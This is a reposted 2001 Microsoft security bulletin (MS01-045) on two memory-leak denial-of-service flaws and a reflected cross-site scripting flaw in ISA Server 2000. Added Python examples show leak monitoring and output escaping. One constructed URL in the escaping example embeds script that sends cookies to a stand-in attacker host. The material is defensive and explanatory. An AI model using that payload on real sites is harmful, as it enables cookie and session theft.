Computer Security


Related information

  DoS and cross-site scripting in MS ISA (DoS, cross-site scripting)

From:MICROSOFT <secure_(at)_microsoft.com>
Date:17.08.2001
Subject:Security Bulletin MS01-045

- ----------------------------------------------------------------------
Title:      ISA Server H.323 Gatekeeper Service Contains Memory Leak
Date:       16 August 2001
Software:   ISA Server 2000
Impact:     Denial of service, cross-site scripting
Bulletin:   MS01-045

Microsoft encourages customers to review the Security Bulletin at:
http://www.microsoft.com/technet/security/bulletin/MS01-045.asp.
- ----------------------------------------------------------------------

Issue:
======
This bulletin discusses three security vulnerabilities that are
unrelated except in the sense that all three affect ISA Server 2000:

- A denial of service vulnerability involving the H.323 Gatekeeper
  Service, a service that supports the transmission of voice-over-IP
  traffic through the firewall. The service contains a memory leak
  that is triggered by a particular type of malformed H.323 data.
  Each time such data is received, the memory available on the
  server is depleted by a small amount; if an attacker repeatedly
  sent such data, the performance of the server could deteriorate to
  the point where it would effectively disrupt all communications
  across the firewall. A server administrator could restore normal
  service by cycling the H.323 service.
- A denial of service vulnerability in the Proxy service. Like the
  vulnerability above, this one is caused by a memory leak, and could
  be used to degrade the performance of the server to the point where
  it disrupts communications.
- A cross-site scripting vulnerability affecting the error page
  that ISA Server 2000 generates in response to a failed request
  for a web page. An attacker could exploit the vulnerability by
  tricking a user into submitting to ISA Server 2000 a URL that
  has the following characteristics: (a) it references a valid
  web site; (b) it requests a page within that site that can't be
  retrieved - that is, a non-existent page or one that generates
  an error; and (c) it contains script within the URL. The error
  page generated by ISA Server 2000 would contain the embedded
  script commands, which would execute when the page was displayed
  in the user's browser. The script would run in the security domain
  of the web site referenced in the URL, and would be able to access
  any cookies that site has written to the user's machine.
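The two memory-leak issues above share one operational signature: memory consumed by the service climbs a little with every malformed message and never comes back until the service is cycled. The following is an added illustration, not code from the bulletin or from ISA Server, of how a monitor can tell that sustained, one-directional growth apart from the normal fluctuation of a busy service and decide when a restart is warranted. The sample series, the sampling interval, and the thresholds are constructed assumptions; the real counter to poll (e.g. the service process's private bytes) and the threshold that fits a given deployment have to be chosen by the administrator.

```python
from statistics import mean

# Constructed memory samples in MB, one per minute. Assumed data for
# illustration only; these are not measurements of ISA Server.
HEALTHY = [120, 124, 119, 131, 122, 118, 127, 121, 125, 119, 123, 120]
LEAKING = [120, 126, 131, 139, 144, 152, 157, 166, 171, 180, 186, 193]


def growth_rate(samples, interval_minutes=1.0):
    """Least-squares slope of memory usage over time, in MB per minute.

    A slope near zero means the service is stable; a positive slope that
    persists across the whole window is the leak signature.
    """
    n = len(samples)
    xs = [i * interval_minutes for i in range(n)]
    x_mean, y_mean = mean(xs), mean(samples)
    num = sum((x - x_mean) * (y - y_mean) for x, y in zip(xs, samples))
    den = sum((x - x_mean) ** 2 for x in xs)
    return num / den if den else 0.0


def is_monotonic_growth(samples, tolerance=0):
    """True if usage never drops by more than `tolerance` between samples.

    A service under normal load frees memory as sessions end, so its usage
    goes up and down; a leaking service only ever climbs.
    """
    return all(b >= a - tolerance for a, b in zip(samples, samples[1:]))


def should_cycle_service(samples, slope_threshold=2.0, min_samples=10):
    """Decide whether the observed growth looks like the leak in the bulletin.

    Both conditions must hold: a sustained positive slope (assumed threshold
    of 2 MB/min) and no release of memory across the window. Requiring a
    minimum number of samples avoids restarting on a short burst of load.
    """
    if len(samples) < min_samples:
        return False
    return growth_rate(samples) >= slope_threshold and is_monotonic_growth(samples)


if __name__ == "__main__":
    for name, series in (("healthy", HEALTHY), ("leaking", LEAKING)):
        print(f"{name}: slope={growth_rate(series):.2f} MB/min, "
              f"cycle={should_cycle_service(series)}")
```

Restarting the service is the recovery the bulletin describes, not a fix; the monitor only shortens the window in which an attacker can drive the server to the point of disrupting traffic, and the patch remains the actual remedy.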

Mitigating Factors:
====================
H.323 Denial of service vulnerability:
- The vulnerability could only be exploited if the H.323 Gatekeeper
  Service was installed. It is only installed by default if "Full
  Installation" is chosen; if "Typical Installation" is selected,
  it is not installed.
- The vulnerability would not enable an attacker to gain any
  privileges on an affected server or add any traffic to an existing
  voice-over-IP session. It is strictly a denial of service
  vulnerability.

Proxy Service Denial of service vulnerability:
- The vulnerability could only be exploited by an internal user; it
  could not be exploited by an Internet user.
- The vulnerability would not enable an attacker to gain any
  privileges on an affected server or compromise any cached content
  on the server. It is strictly a denial of service vulnerability.

Cross-site scripting vulnerability:
- In order to run script in the security domain of a trusted site,
  the attacker would need to know which sites, if any, a user
  trusted. Most users use the default security settings for all web
  sites, which would effectively deny an attacker any gain in
  exploiting the vulnerability for the purposes of running script.
- An attacker who wished to read other sites' cookies on a user's
  machine would have no way to know which sites had placed cookies
  there. The attacker would need to exploit the vulnerability once
  for every web site whose cookies she wished to access.
- Even if the attacker correctly guessed which sites had placed
  cookies on a user's machine, there should be no sensitive
  information in the cookies, if best practices have been followed.
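The cross-site scripting issue described above is a reflected one: the proxy copies the failed URL into an error page that the browser attributes to the origin of the site named in the URL, so any script in that URL runs with that site's cookies. The following is an added example, not ISA Server's own error-page code, that contrasts a constructed error template which reflects the URL verbatim with a hardened version that HTML-escapes it first. The template text, the attack URL, and the helper names are assumptions for illustration.

```python
import html
from urllib.parse import urlsplit

# Constructed attack URL with the three properties the bulletin lists:
# a valid host, a page that will not be found, and script inside the URL.
ATTACK_URL = (
    "http://www.example.com/nonexistent"
    "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
)

# Assumed error template; ISA Server's real page layout is not known here.
ERROR_TEMPLATE = (
    "<html><body><h1>Error: the page could not be retrieved</h1>"
    "<p>The requested URL {url} could not be retrieved.</p>"
    "</body></html>"
)


def vulnerable_error_page(requested_url: str) -> str:
    """Reflects the requested URL into the error page without encoding.

    Any '<script>' in the URL lands in the HTML unchanged and executes
    when the browser renders the error page.
    """
    return ERROR_TEMPLATE.format(url=requested_url)


def hardened_error_page(requested_url: str) -> str:
    """HTML-escapes the untrusted URL before it is placed in the page.

    '<', '>', '&' and both quote characters become entities, so the browser
    displays the text of the URL instead of parsing it as markup.
    """
    return ERROR_TEMPLATE.format(url=html.escape(requested_url, quote=True))


def script_origin(requested_url: str) -> str:
    """Origin the browser would assign to the error page, and therefore the
    security domain in which reflected script would run: that of the site
    named in the URL, not that of the attacker."""
    parts = urlsplit(requested_url)
    return f"{parts.scheme}://{parts.netloc}"


def contains_live_script(page: str) -> bool:
    """Crude check for an unescaped <script> tag surviving into the page."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("script would run in origin:", script_origin(ATTACK_URL))
    print("vulnerable page executes script:",
          contains_live_script(vulnerable_error_page(ATTACK_URL)))
    print("hardened page executes script:",
          contains_live_script(hardened_error_page(ATTACK_URL)))
```

Encoding at the point where untrusted data enters the HTML is the general fix for this class; it does not depend on guessing which URLs are malicious, and it leaves ordinary URLs rendered exactly as before.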

Patch Availability:
===================
- A patch is available to fix these vulnerabilities. Please read the
  Security Bulletin
  http://www.microsoft.com/technet/security/bulletin/ms01-045.asp
  for information on obtaining this patch.

Acknowledgment:
===============
- Peter Grundl for reporting the memory leaks in the H.323
  Gatekeeper Service and the Proxy Service.
- Dr. Hiromitsu Takagi for reporting the cross-site scripting
  vulnerability.

- ---------------------------------------------------------------------

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED
"AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL
WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT
SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY
DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL,
CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF
MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION
OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO
THE FOREGOING LIMITATION MAY NOT APPLY.

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod